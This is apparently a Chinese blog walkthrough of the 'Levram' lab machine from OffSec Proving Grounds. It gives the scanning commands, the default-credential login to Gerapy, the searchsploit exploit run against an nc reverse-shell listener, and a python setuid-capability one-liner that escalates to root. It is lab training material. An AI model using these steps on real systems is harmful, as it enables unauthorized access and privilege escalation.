Levram

03110
Levram-白鸢的笔记
Levram
此内容为付费阅读,请付费后查看
999999999999
立即购买
您当前未登录!建议登陆后购买,可保存购买订单
付费阅读

简介

point 10

Warm up

Difficulty Easy

rated by community Easy

 

Part 3 of Mid Year CTF machines

 

实验环境

攻击者 Kali 192.168.45.200

受害者 IP 192.168.200.24   Linux

 

1. 信息收集

收集受害者服务详情

2024-03-09_18-26

发现了8080端口

 

FUZZ测试

export URL="http://192.168.200.24:8000/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

没有什么发现

 

nikto扫描

nikto -host=http://192.168.200.24:8000

没有什么发现

 

2. 漏洞发现和利用

访问8000端口的HTTP服务

2024-03-09_19-38

我尝试用admin:admin弱密码直接进入

 

2024-03-09_20-42

随便建立一个项目(一开始我没有 使用漏洞的时候报错)

 

在最下面看到了CMS的版本信息

2024-03-09_20-43

 

searchsploit Gerapy

2024-03-09_20-44

正好有一个

 

Kali监听

nc -lvnp 4444

 

python3 50640.py -t 192.168.231.24 -p 8000 -L 192.168.45.242 -P 4444

 

-t 后面加对方IP

-p 后面加对方端口

-L 后面加攻击者IP

-P 后面加攻击者Port

2024-03-09_20-47

监听的那个终端就拿到了shell

 

3. 后渗透阶段

查看网络信息

netstat -antlp

2024-03-09_20-49

没有什么值得注意的端口监听

 

查看版本和内核信息

app@ubuntu:~/gerapy$ uname -a
Linux ubuntu 5.15.0-73-generic #80-Ubuntu SMP Mon May 15 15:18:26 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
app@ubuntu:~/gerapy$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04 LTS"
PRETTY_NAME="Ubuntu 22.04 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

版本都比较高 暂时内核提权不考虑

 

查看app用户家目录

app@ubuntu:~$ ls -l
total 16
drwxr-xr-x 5 app app 4096 Jun 14  2023 gerapy
-rw-rw-r-- 1 app app   33 Mar  9 18:51 local.txt
drwxr-xr-x 2 app app 4096 Aug 15  2023 logs
-rwxr-xr-x 1 app app  109 Jun 13  2023 run.sh
app@ubuntu:~$ cat local.txt 
bd152a7ad2fb33234c2d2b50bf0a3da2

成功get到一个flag

 

查看suid信息

find / -user root -perm -4000 2>/dev/null -exec ls -l {} \;

2024-03-09_20-53发现一个很有可能的提权位置

app@ubuntu:~$ pkexec --version
pkexec version 0.105

版本也是对的

但是试验过后没有用

 

我们到/opt目录查看

app@ubuntu:~/pkexec-CVE-2021-4034$ cd /opt
app@ubuntu:/opt$ ls -l
total 4
drwx--x--x 4 root root 4096 Jun 12  2023 containerd

哦 好像有containerd目录 首先想到lxd权限升级

 

getcap -r / 2>/dev/null

2024-03-09_20-57

ok 这个可以提权

 

/usr/bin/python3.10 -c 'import os;os.setuid(0); os.system("/bin/bash")'

2024-03-09_20-58

成功提权 拿到第二个flag

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Offensive Security PG Practise
喜欢就支持一下吧
点赞10 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
Exfiltrated-白鸢的笔记
Exfiltrated
Exfiltrated
1年前 92
Flimsy-白鸢的笔记
Flimsy
Flimsy
1年前 91
LaVita-白鸢的笔记
LaVita
LaVita
1年前 85
Jacko-白鸢的笔记
Jacko
Jacko
1年前 83
DepthB2R SSH远程代码执行-白鸢的笔记
DepthB2R SSH远程代码执行
DepthB2R SSH远程代码执行
1年前 76
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片